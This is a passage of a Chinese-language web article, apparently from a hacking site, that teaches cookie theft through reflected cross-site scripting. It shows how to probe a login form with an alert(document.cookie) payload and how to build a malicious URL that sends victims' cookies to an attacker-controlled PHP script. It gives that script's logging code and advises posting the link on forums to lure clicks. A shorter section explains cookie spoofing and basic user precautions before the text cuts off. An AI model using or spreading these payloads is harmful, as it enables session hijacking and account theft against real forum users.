<p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　首先打开我们要收集Cookie的网站，这里假设是http://www.XXX.net，登陆网站输入用户名&#8220;<a1>&#8221;（不含引号），对数据进行分析抓包，得到形如&#8220;http://www.XXX.net/txl/login/login.pl?username=<a1>&amp;passwd=&amp;ok.x=28&amp;ok.y=6&#8221;的代码，将&#8220;<a1>&#8221;更换为&#8220;            <script>alert(document.cookie)</script>            &#8221;再试；如果执行成功，就开始构造URL：&#8220;http://www.XXX.net/txl/login/login.pl?username=            <script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>            &amp;passwd=&amp;ok.x=28&amp;ok.y=6&#8221;。其中http:///www.cbifamily.org/cbi.php就是你能够控制的某台主机上的一个脚本。需要注意的是&#8220;%2B&#8221;为符号&#8220;+&#8221;的URL编码，因为&#8220;+&#8221;将被作为空格处理。该URL就可以在<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>中发布，诱使别人点击了。</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　2.编制PHP脚本</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　该脚本的作用就是收集Cookie文件，具体内容如下：</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　　　<?php<br>　　　　$info = getenv("QUERY_STRING");<br>　　　　if ($info) {<br>　　　　$fp = fopen("info.txt","a");<br>　　 fwrite($fp,$info."\n");<br>　　 fclose($fp);<br>　　　　}<br>　　　　header("Location: http://www.XXX.net");<br>　　　　?&gt;</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"><br>　　四、Cookie的安全问题 适用对象：所有希望上网安全的读者</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　1.Cookie欺骗</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　Cookie记录着用户的帐户ID、密码之类的信息，如果在网上传递，通常使用的是MD5方法加密。这样经过加密处理后的信息，即使被网络上一些别有用心的人截获，也看不懂，因为他看到的只是一些无意义的字母和数字。然而，现在遇到的问题是，截获Cookie的人不需要知道这些字符串的含义，他们只要把别人的Cookie向服务器提交，并且能够通过验证，他们就可以冒充受害人的身份，登陆网站。这种方法叫做Cookie欺骗。Cookie欺骗实现的前提条件是服务器的验证程序存在漏洞，并且冒充者要获得被冒充的人的Cookie信息。目前网站的验证程序要排除所有非法登录是非常困难的，例如，编写验证程序使用的语言可能存在漏洞。而且要获得别人Cookie是很容易的，用支持Cookie的语言编写一小段代码就可以实现（具体方法见三），只要把这段代码放到网络里，那么所有人的Cookie都能够被收集。如果一个<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>允许HTML代码或者允许使用Flash标签就可以利用这些技术收集Cookie的代码放到<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>里，然后给帖子取一个吸引人的主题，写上有趣的内容，很快就可以收集到大量的Cookie。在<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>上，有许多人的密码就被这种方法盗去的。至于如何防范，目前还没有特效药，我们也只能使用通常的防护方法，不要在<a class=Channel_KeyLink href="http://bbs.77169.com/">论坛</a>里使用重要的密码，也不要使用IE自动保存密码的功能，以及尽量不登陆不了解底细的网站。</p>            <p class=ContentFont style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">　　2.Flash的代码隐患</p>            <p class=ContentFont style="PADDING